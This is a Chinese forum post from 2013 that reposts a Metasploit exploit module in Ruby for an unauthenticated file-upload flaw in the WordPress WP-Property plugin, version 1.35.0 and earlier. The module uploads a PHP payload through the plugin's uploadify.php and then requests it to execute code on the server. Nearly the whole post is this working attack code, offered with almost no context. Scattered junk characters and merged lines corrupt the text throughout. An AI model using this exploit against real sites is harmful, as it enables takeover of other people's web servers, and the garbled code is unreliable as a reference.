WordPress WP-Property PHP 文件上传漏洞3 @6 \& ]; _& g5 d+ ^: [: j8 J, z
( ~' A" @' d; R- h' U
## # This file is part of the Metasploit Framework and may be subject to9 J7 q! p# K9 i2 W
5 \. [: G0 x* C8 Y, B- z' x, X( R# redistribution and commercial restrictions. Please see the Metasploit) L, _: u, {; ]/ N: L& z/ Q
, ?: D1 [( y4 F$ U! c9 T4 o/ J# Framework web site for more information on licensing and terms of use.1 b6 ?/ g6 M% X5 K% J4 H
3 j3 x9 i2 u! |0 m" B
# http://metasploit.com/framework/ ##/ u: O3 d8 }! L& }5 l) o b
) B# y9 [; t0 \# s
; _* g' a+ \5 I) H( w9 z1 G2 ?6 F# K4 ?! |$ `# ~8 r
% O3 t5 V8 k9 Z! z2 ^, q
) P& q2 S1 B) M& p! l8 erequire 'msf/core'; K0 t5 O. w$ y5 v O% M
require 'msf/core/exploit/php_exe'- Y3 F; T, }1 q9 e$ e3 a
" _2 u! Q" F6 O$ ^
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',7 m2 o) l4 v3 l
'Description' => %q{; ]0 i& I0 s9 F" m- o7 y: B" H5 x
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => k9 p+ d2 f2 o
[
, u; z6 r: X' G. u( H N. U'Sammy FORGIT', # initial discovery
; O, x; _, \5 d5 f& j V'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. b* t4 _# I+ T; o1 S2 N5 T4 Q],0 J& A' E7 i% c
'License' => MSF_LICENSE,
& ~, e, Y- q, ]'References' =>, N8 H% ]3 W% Y W
[
9 a, D( F. c: F" c+ {[ 'OSVDB', '82656' ],; \+ Z' M8 ?& j4 @/ h9 B; J/ g
[ 'BID', '53787' ],
; N- ~6 I7 U4 @+ Q ]7 F( k. w& l[ 'EDB', '18987'],2 `! f# q% E6 A! g6 o V4 _
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
1 O, v! r- Z. E t, \8 h],
) y! I3 x, c6 O: x/ Z$ z5 ]'Payload' =>
1 e. P9 E' o/ J R2 w{9 C* P$ e( o6 }$ ]
'BadChars' => "\x00",+ U; d) R# U) W0 ? G" A& {
},& L- P! `9 C! f2 M5 x/ x
'Platform' => 'php',
: `6 R, o! j, e7 A' S; s8 @'Arch' => ARCH_PHP,' |( l4 a& e# I( e5 k9 P2 A
'Targets' =>
8 z5 o/ u/ \" W# w: D" q[, U2 s. u5 G E) A1 l
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
+ w' q' C( M0 w8 N* A6 @[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
+ L7 x5 a* j8 j! M2 j5 I0 o9 T],( C/ T- c( l& _! ~6 s
'DefaultTarget' => 0,' f# O3 i3 G' ?. N8 q Y v
'DisclosureDate' => 'Mar 26 2012')). }3 G+ m; v6 }% u6 c$ @4 \$ r
" u% ?0 L4 T7 P! M8 u3 I z) X
register_options(
\: [" d/ m# N6 y" n[
: X, _- m& e) A4 t9 xOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']) O- [5 J. I4 M$ C6 i
], self.class)8 U7 O; a' [6 q# w; A v$ l
end
% @ s9 ?# N4 {6 s9 t& z& k
* m, D* _9 W- j0 k2 x" i% f) a/ p7 cdef check
7 }& a& Z9 `" Y f& X' zuri = target_uri.path
7 c" X! `7 T1 w$ ouri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
$ n1 s2 O$ g, G+ S'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"# S" J( P% p- D% ]
})
, `0 N& Q" {2 \! Y* y6 f" U% k
% F/ ~) {- N2 S7 h1 @5 Cif not res or res.code != 200; l, D0 S1 H$ q$ ~
return Exploit::CheckCode::Unknown
' f) k- m$ u ] m; c; H9 g+ Qend4 z8 A- y4 {5 b9 {
@8 h/ |* r1 T8 }* ], treturn Exploit::CheckCode::Appears! u9 J$ D, Y5 r
end
: h8 G0 N& T8 J) S' q7 w3 Y5 J" X4 [' @) r
def exploit& m5 _/ d* E+ v" }4 y5 V k" B
uri = target_uri.path
& W H# T& i; H( a2 \5 g& ^( `uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
( _0 b* g7 ]4 n( t
0 s# X1 Y; Z- Q rdata = Rex::MIME::Message.new4 Y1 z8 r% L4 I: a6 B
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
4 o7 K. O B% e: d, Gdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
9 _, y' j9 c/ R9 Spost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'). U5 L8 c. t, k% L2 J& `3 A
/ \) ~5 \7 W' h2 |' c2 f5 U+ n
print_status("#{peer} - Uploading payload #{@payload_name}")
6 J" U& r; S. _, L5 {( q* D! [0 }res = send_request_cgi({0 ]; _& C3 H3 I3 I0 `; O. T
'method' => 'POST',# y/ f8 z: w O1 w s% t, x
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", w4 i8 n, G3 M
'ctype' => "multipart/form-data; boundary=#{data.bound}",
! U4 v0 K. H. k. k0 o8 Y'data' => post_data
9 q* }4 K8 T, o})) U5 l6 H. y# s0 p7 N _. `
8 u* _% P$ c1 ]( \9 fif not res or res.code != 200 or res.body !~ /#{@payload_name}/
8 B- v/ \& j& c7 w- ~ pfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; @( j$ v; u5 _% B+ D# Wend+ n1 k7 ^5 |* I/ }# w& {! P$ g
b; n3 q/ o. o. pupload_uri = res.body
( Y: O4 A" W3 P; \# j$ R* x: h% w' R+ R3 y. L% N% h- X2 D8 J9 y
print_status("#{peer} - Executing payload #{@payload_name}")
8 F1 Q7 t# S$ k0 W8 Cres = send_request_raw({
7 A) y/ J; b* C$ M$ u$ ^'uri' => upload_uri,* k7 ^" }' ^3 \$ H0 m& o/ c) n
'method' => 'GET'
$ t6 d# s# H3 j+ i. i9 w})
1 O8 g' G* T; c' e5 S$ gend/ c3 y; {, d1 T* F- K Q
end
* ]) h0 Z' ]: M: x: I
8 q; f) Y: |' a$ L/ k2 K不要问我这写的是什么 怎么利用 我是说msf.) E7 v, O! O$ k
/ p- ^3 I2 c/ ?& I, {, h# @ |
发表于 2013-1-4 19:51:30
收藏
支持
反对